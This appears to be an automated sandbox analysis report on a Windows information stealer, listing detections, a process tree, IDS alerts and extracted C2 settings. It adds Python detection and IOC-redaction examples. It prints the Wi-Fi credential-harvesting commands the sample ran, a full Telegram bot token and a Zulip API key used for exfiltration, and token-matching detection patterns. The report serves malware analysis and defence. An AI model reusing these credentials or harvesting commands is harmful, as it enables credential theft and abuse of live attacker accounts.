
Windows Analysis Report
LKxcbzlwkz.exe

Overview

General Information

Sample name: LKxcbzlwkz.exe (renamed because the original name is a hash value)
Original sample name: 02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801.exe
Analysis ID: 1565141
MD5: 8959a4884f81ac4db0967b534dae9617
SHA1: e4cc4e745820910b4f427b6c2385a43c87b7ce3b
SHA256: 02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801
Tags: exe, virustotal-vm-blacklist, user-JAMESWT_MHT

Detection

AveMaria, KeyLogger, Stealerium
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AveMaria stealer
Yara detected Keylogger Generic
Yara detected Stealerium
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops password protected ZIP file
Found many strings related to Crypto-Wallets (likely being stolen)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LKxcbzlwkz.exe (PID: 4924 cmdline: "C:\Users\user\Desktop\LKxcbzlwkz.exe" MD5: 8959A4884F81AC4DB0967B534DAE9617)
    • JOUNLV.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" MD5: 8F39B25AF1B9048E0C7B06256C602B4F)
      • cmd.exe (PID: 7280 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7372 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7432 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • findstr.exe (PID: 7440 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 7520 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • netsh.exe (PID: 7600 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7940 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7984 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • taskkill.exe (PID: 8000 cmdline: taskkill /F /PID 4828 MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • timeout.exe (PID: 8028 cmdline: timeout /T 2 /NOBREAK MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • openfiles.exe (PID: 3492 cmdline: OPENFILES MD5: 50BD10A4C573E609A401114488299D3D)
  • msiexec.exe (PID: 7380 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name: Ave Maria, AveMariaRAT, avemaria
Description: Information stealer which uses AutoIT for wrapping.
Attribution: Anunak
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name: 404 Keylogger, 404KeyLogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name: Stealerium
Description: According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes and malware analysis tools, and checking whether the process is being debugged. The malware also embeds a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor's addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord webhook.
Attribution: No attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium
{"C2 url": "https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7944498476, "is_bot": true, "first_name": "Patriotrosh", "username": "Patriotp210Rohs_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip | JoeSecurity_Stealerium | Yara detected Stealerium | Joe Security
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | JoeSecurity_Stealerium | Yara detected Stealerium | Joe Security
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(6 entries in total; list truncated)

Source | Rule | Description | Author | Strings
00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Stealerium | Yara detected Stealerium | Joe Security
00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealerium | Yara detected Stealerium | Joe Security
00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_Discord_Regex | Detects executables referencing Discord tokens regular expressions | ditekSHen
  • 0x6336:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
(22 entries in total; list truncated)

Source | Rule | Description | Author | Strings
1.0.JOUNLV.exe.1bb35cc0000.0.unpack | JoeSecurity_Stealerium | Yara detected Stealerium | Joe Security
1.0.JOUNLV.exe.1bb35cc0000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
1.0.JOUNLV.exe.1bb35cc0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.0.JOUNLV.exe.1bb35cc0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_Discord_Regex | Detects executables referencing Discord tokens regular expressions | ditekSHen
  • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

Stealing of Sensitive Information

Source: Process started
Author: Joe Security
Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, ParentProcessId: 4828, ParentProcessName: JOUNLV.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7280, ProcessName: cmd.exe
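The process tree shows the Wi-Fi recon as two `cmd.exe /C chcp 65001 && netsh wlan ...` wrappers spawned by JOUNLV.exe (chcp 65001 switches the console code page to UTF-8 before netsh runs), and the Sigma hit above fires on the first of them. The Python below is an added example written for this page; it is not Joe Sandbox's Sigma rule and not code from the sample. It is a minimal Sigma-style matcher with three rules, run over constructed process-creation events whose PIDs, images and command lines are copied from the tree, plus two made-up benign events for contrast. The rule names and the `wlan_key_dump` rule are the example's own assumptions; the report's tree contains no `key=clear` command.

```python
"""Sigma-style process-creation matcher for the netsh WLAN harvesting chain."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


# Constructed events. The first five are copied from the report's process tree;
# PIDs 9001 and 9002 are made-up benign noise that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(7280, r"C:\Windows\System32\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All',
              r"C:\Users\user\AppData\Local\Temp\JOUNLV.exe"),
    ProcEvent(7432, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(7520, r"C:\Windows\System32\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid',
              r"C:\Users\user\AppData\Local\Temp\JOUNLV.exe"),
    ProcEvent(7600, r"C:\Windows\System32\netsh.exe", "netsh wlan show networks mode=bssid",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(8000, r"C:\Windows\System32\taskkill.exe", "taskkill /F /PID 4828",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(9001, r"C:\Windows\System32\netsh.exe", "netsh interface show interface",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(9002, r"C:\Windows\System32\cmd.exe", '"cmd.exe" /C dir',
              r"C:\Windows\explorer.exe"),
]

# Each rule mirrors a Sigma selection of Image|endswith plus CommandLine|contains|all.
RULES = {
    # Step 1 in the tree (PIDs 7280/7432): enumerate the saved Wi-Fi profiles.
    "wlan_profile_enumeration": {
        "image_endswith": ("\\cmd.exe", "\\netsh.exe"),
        "contains_all": ("netsh", "wlan", "show", "profile"),
    },
    # Step 2 (PIDs 7520/7600): survey nearby networks with BSSIDs (location recon).
    "wlan_bssid_survey": {
        "image_endswith": ("\\cmd.exe", "\\netsh.exe"),
        "contains_all": ("netsh", "wlan", "show", "networks", "mode=bssid"),
    },
    # Not in this report's tree, but the usual next step once profile names are
    # known: dump the pre-shared key in clear text. Hunt for it as well.
    "wlan_key_dump": {
        "image_endswith": ("\\cmd.exe", "\\netsh.exe"),
        "contains_all": ("netsh", "wlan", "show", "profile", "key=clear"),
    },
}


def _norm(text: str) -> str:
    """Collapse whitespace and lower-case so spacing or casing tricks do not evade."""
    return re.sub(r"\s+", " ", text).lower()


def match_rule(ev: ProcEvent, rule: dict) -> bool:
    if not ev.image.lower().endswith(rule["image_endswith"]):
        return False
    cmd = _norm(ev.command_line)
    return all(tok in cmd for tok in rule["contains_all"])


def run_rules(events, rules=RULES) -> dict:
    """Map each rule that fired to the sorted PIDs that triggered it."""
    hits = {}
    for ev in events:
        for name, rule in rules.items():
            if match_rule(ev, rule):
                hits.setdefault(name, []).append(ev.pid)
    return {name: sorted(pids) for name, pids in hits.items()}


def suspicious_parents(events, rules=RULES) -> list:
    """Parent images whose children triggered more than one distinct WLAN rule.

    A lone `netsh wlan show profile` is routine admin noise; one parent driving both
    profile enumeration and a BSSID survey is the stealer pattern. Because the tree
    wraps every netsh call in cmd.exe, both JOUNLV.exe and cmd.exe surface here; the
    non-shell parent is the one to pivot on.
    """
    seen = {}
    for ev in events:
        for name, rule in rules.items():
            if match_rule(ev, rule):
                seen.setdefault(ev.parent_image, set()).add(name)
    return sorted(parent for parent, names in seen.items() if len(names) > 1)


if __name__ == "__main__":
    for name, pids in run_rules(SAMPLE_EVENTS).items():
        print(f"{name}: {pids}")
    print("parents:", suspicious_parents(SAMPLE_EVENTS))
```

On the constructed events the two observed stages fire on PIDs 7280/7432 and 7520/7600, the `key=clear` rule stays silent, and both JOUNLV.exe and its cmd.exe wrapper are returned as parents. The `chcp 65001 &&` prefix on every netsh wrapper is a cheap secondary pivot for finding the rest of the collection chain under the same parent.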
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T10:57:29.778769+0100 | 2029323 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T10:57:20.485145+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.16.184.241 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T10:57:11.769478+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:14.183543+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.307649+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.713755+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.448959+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.857531+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.592309+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.999747+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:37.702732+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:38.114926+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:59.824195+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:59:00.231281+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T10:57:11.769478+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:14.183543+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.307649+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.713755+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.448959+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.857531+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.592309+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.999747+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:37.702732+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:38.114926+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:59.824195+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:59:00.231281+0100 | 2834392 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP


AV Detection

Source: LKxcbzlwkz.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp | Avira: detection malicious, Label: TR/AVI.Stealerium.sbcde
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Avira: detection malicious, Label: TR/AVI.Stealerium.sbcde
Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: JOUNLV.exe.4828.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7944498476, "is_bot": true, "first_name": "Patriotrosh", "username": "Patriotp210Rohs_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp | ReversingLabs: Detection: 65%
Source: LKxcbzlwkz.exe | ReversingLabs: Detection: 78%
Source: Yara match | File source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Joe Sandbox ML: detected
Source: LKxcbzlwkz.exe | Joe Sandbox ML: detected
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: 7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: -4556397073
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: https://api.telegram.org/bot
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: https://szurubooru.zulipchat.com/api/v1/messages
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: szurubooru@gmail.com
Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack | String decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
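The string-decryptor output above hands over the complete Telegram bot token, the Bot API base URL, a Zulip messages endpoint with its account and API key, and a chat id. What follows is an added example written for this page, not part of the sandbox report and not code from the sample: a small Python extractor that pulls these indicator types out of a strings dump, reusing the Discord-token regex quoted from the INDICATOR_SUSPICIOUS_EXE_Discord_Regex YARA rule in the Yara section, and redacts the Telegram secret before the indicators are shared, since an unredacted token is a live credential for the operator's bot. Every token, key, host, id and name in the sample input is constructed: `example.zulipchat.com`, `example_bot`, the 35-character run of `A` and the Discord-shaped string are placeholders, not values from the analysed sample.

```python
"""Pull C2 indicators out of a decrypted-strings dump and redact them for sharing."""
import json
import re
from urllib.parse import urlsplit

# Telegram bot tokens are "<numeric bot id>:<35-char secret>" and appear either bare
# or inside the Bot API path as /bot<token>/<method>.
TELEGRAM_TOKEN_RE = re.compile(r"(?<![0-9])(\d{8,12}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# $s1 of the INDICATOR_SUSPICIOUS_EXE_Discord_Regex YARA rule quoted in the report.
DISCORD_TOKEN_RE = re.compile(
    r"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Chat APIs that double as C2 transports (Telegram and Zulip in this report, Discord
# in the Stealerium description). Zulip is per-tenant, so match the parent domain.
MESSAGING_API_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com"}

# Constructed strings dump, shaped like the report's "String decryptor" rows and the
# getMe JSON in "Telegram Stream". All values below are made up.
FAKE_SECRET = "A" * 35
FAKE_TOKEN = f"1234567890:{FAKE_SECRET}"
SAMPLE_STRINGS = "\n".join([
    "https://api.telegram.org/bot",
    FAKE_TOKEN,
    "-1001234567890",                      # chat id, must not be mistaken for a token
    f"https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage",
    "https://example.zulipchat.com/api/v1/messages",
    "bot-user@example.com",
    "NzkyMjA1NjkwOTk3NzI2NTQ3.Gh7Vkl.ABCDEFGHIJKLMNOPQRSTUVWXYZ0",   # Discord-shaped
])
SAMPLE_GETME = json.dumps({"ok": True, "result": {"id": 1234567890, "is_bot": True,
                                                   "first_name": "Example",
                                                   "username": "example_bot"}})


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def _is_messaging_api(host: str) -> bool:
    return host in MESSAGING_API_HOSTS or host.endswith(".zulipchat.com")


def extract_iocs(text: str) -> dict:
    """Collect URLs, Telegram bot ids/tokens, Discord-shaped tokens and C2-capable hosts."""
    urls = sorted(set(URL_RE.findall(text)))
    tokens = sorted({f"{bot_id}:{secret}" for bot_id, secret in TELEGRAM_TOKEN_RE.findall(text)})
    return {
        "urls": urls,
        "telegram_bot_ids": sorted({t.split(":", 1)[0] for t in tokens}),
        "telegram_tokens": tokens,
        "discord_token_like": sorted(set(DISCORD_TOKEN_RE.findall(text))),
        "messaging_api_hosts": sorted({_host(u) for u in urls if _is_messaging_api(_host(u))}),
    }


def redact_telegram_token(token: str, keep: int = 4) -> str:
    """Keep the bot id (public, needed to report the bot) and a short prefix of the secret."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:keep]}{'*' * (len(secret) - keep)}"


def shareable_iocs(text: str) -> dict:
    """extract_iocs() with every live Telegram token redacted, inside URLs as well."""
    iocs = extract_iocs(text)
    iocs["telegram_tokens"] = [redact_telegram_token(t) for t in iocs["telegram_tokens"]]
    iocs["urls"] = [TELEGRAM_TOKEN_RE.sub(lambda m: redact_telegram_token(m.group(0)), u)
                    for u in iocs["urls"]]
    return iocs


def bot_identity(getme_json: str) -> str:
    """Turn a Bot API getMe response (what the sandbox captured as "Telegram Stream")
    into the handle to report: the operator's bot username and numeric id."""
    result = json.loads(getme_json)["result"]
    return f"@{result['username']} (id {result['id']})"


if __name__ == "__main__":
    print(json.dumps(shareable_iocs(SAMPLE_STRINGS), indent=2))
    print(bot_identity(SAMPLE_GETME))
```

The bot id is deliberately left in clear: it is what a takedown request to Telegram needs, and it is not a secret. The secret half is what lets anyone call `sendMessage` or `getUpdates` as the operator's bot, which is why it should not travel in a shared IOC list even when it was found in a public sandbox report.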
Source: LKxcbzlwkz.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.138.68.212:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 31.14.70.249:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 50.17.0.11:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb | source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: winload_prod.pdb | source: Temp.txt.1.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 | source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 | source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
